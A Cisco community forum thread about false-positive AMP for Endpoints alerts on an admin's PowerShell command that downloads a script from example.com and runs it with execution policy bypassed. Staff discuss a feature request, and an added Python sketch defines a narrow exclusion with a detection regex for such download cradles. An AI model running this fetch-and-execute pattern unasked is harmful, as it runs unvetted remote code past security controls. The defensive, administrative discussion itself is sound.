
Exclude/whitelist certain PowerShell commands

thomas.methlie
Level 1

Admins, being admins, like to use PowerShell to solve certain tasks. To do this they will often run a PowerShell file downloaded from a server, e.g.:

C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('https://example.com/script.ps1'))

This being an obvious red flag triggers AMP, but gives a lot of false positives in this case. 

 

Is there any way to exclude/whitelist something like this? Like the full command with arguments, the server from which it downloads??

 

Regards,

Thomas

1 Accepted Solution

Troja007
Cisco Employee

Opened a Feature Request for you.

Greetings,

Thorsten


balaji.bandi
Hall of Fame

Are you looking to exclude this AMP for endpoint? Here is the exclusion document to exclude certain extensions as per the requirement.

https://www.cisco.com/c/en/us/support/docs/security/amp-endpoints/213681-best-practices-for-amp-for-endpoint-excl.html

BB

Thanks, but that guide doesn't provide any info on my problem. To be more precise, I don't want to exclude the PowerShell process or PS script files on a general basis.

Troja007
Cisco Employee

Hello Thomas,

sorry to say, but, as explained in the documentation this is the way we can handle exclusions today. The best way is to report this missing feature to your Cisco Representative to open a Feature Request for this.

 

Just to be sure: You are getting a lot of IOCs?

 

Greetings,

Thorsten

Hi,

Yeah, this is one of our largest sources of false positive alerts and we spend quite some time cleaning up the dashboard. Could of course mute the events, but I don't feel comfortable muting too much stuff.

Thanks for opening a Feature Request.

 

Regards,

Thomas

So,

what would help? Defining an exclusion with several parameters? 

Including:

  1. Path of the Process, Process name
  2. Hash and Signer
  3. Source where the file is downloaded from

Looks easy, but is much more development effort. The question is where to enforce.

  • Endpoint: We have to define how big the time window is the endpoint can monitor AND what the performance/resource impact on the endpoint is.
  • Backend: Changing the whole logic. This must be done for every customer, because exclusions will be different.
    • We also need some kind of "plausibility check" to avoid impacts in the backend based on wrongly defined exclusions.

But finally, something which should be included in the product.

Cheers,

Thorsten
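An added sketch, not from the thread and not AMP functionality, of the multi-parameter exclusion discussed above, applied as triage over exported alert events: it matches on process path plus download host and runs a plausibility check on each rule. The event field names and rule format are assumptions; hash and signer matching are left out.

```python
import re
from urllib.parse import urlsplit

# URL argument of DownloadString('...') inside a PowerShell command line.
CRADLE_URL = re.compile(r"DownloadString\(\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)

def validate_rule(rule):
    """Plausibility check: refuse rules broad enough to hide real detections."""
    path, host = rule["process_path"], rule["host"]
    if "*" in path or "*" in host:
        raise ValueError("wildcards are not allowed in an exclusion")
    if ":\\" not in path or not path.lower().endswith("\\powershell.exe"):
        raise ValueError("process_path must be the full path to powershell.exe")
    if "." not in host or "/" in host:
        raise ValueError("host must be a bare fully qualified name")
    return rule

def _https_host(url):
    """Return the lowercase host of an https URL, or None for anything else."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return None
    return (parts.hostname or "").lower() if parts.scheme == "https" else None

def is_excluded(event, rules):
    """True only when the path matches a rule and every download host equals its host."""
    hosts = [_https_host(u) for u in CRADLE_URL.findall(event["command_line"])]
    if not hosts:
        return False  # no recognisable download URL: never suppress
    return any(
        event["process_path"].lower() == r["process_path"].lower()
        and all(h == r["host"].lower() for h in hosts)
        for r in rules
    )

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = " -NoProfile -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('%s'))"
RULES = [validate_rule({"process_path": PS, "host": "example.com"})]
# Constructed sample events; the field names are assumptions, not an AMP export schema.
EVENTS = [
    {"process_path": PS, "command_line": PS + CMD % "https://example.com/script.ps1"},
    {"process_path": PS, "command_line": PS + CMD % "https://example.com.evil.test/script.ps1"},
    {"process_path": r"C:\Users\Public\powershell.exe", "command_line": "powershell.exe" + CMD % "https://example.com/script.ps1"},
    {"process_path": PS, "command_line": PS + CMD % "http://example.com/script.ps1"},
]

if __name__ == "__main__":
    for e in EVENTS:
        print("suppress" if is_excluded(e, RULES) else "alert   ", e["command_line"][-50:])
```

Only the first event is suppressed; the lookalike host, the copy of powershell.exe outside System32, and the plain-HTTP download all stay as alerts.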

Yes, the three parameters you mention are what I was initially thinking of.

If there is a need to assist in testing this, I would be happy to help.

 

Regards,

Thomas

Hello @thomas.methlie,

the only way today is, getting in contact with your Cisco Representative to open a Feature Request.

Greetings,

Thorsten


We're waiting with bated breath for this feature to come out as we have the same problem. We use powershell to deploy all our stuff and it triggers Cisco AMP on a weekly basis with false positives. It's causing alert fatigue for our analysts but we don't want to exclude ALL powershell.exe as some of them might in fact be malicious. Please please please give us this new feature that allows exclusions on specific powershell scripts. 

Thanks!

rolszowy
Cisco Employee

There is one option at the moment to exclude a particular IOC by a TAC case.

Radek

Can you elaborate? Where/how can we exclude by IOC?

What is the feature request number? Roadmap timing for this?

Hello,

this Feature Request is an internal one, and not publicly viewable. You may get in touch with your Cisco representative to get more insights into upcoming features in the product.

As the roadmap can always get updated, we do not publish this information in the community.

Greetings,

Thorsten

I saw the feature request was going in in 2019, any update on it?
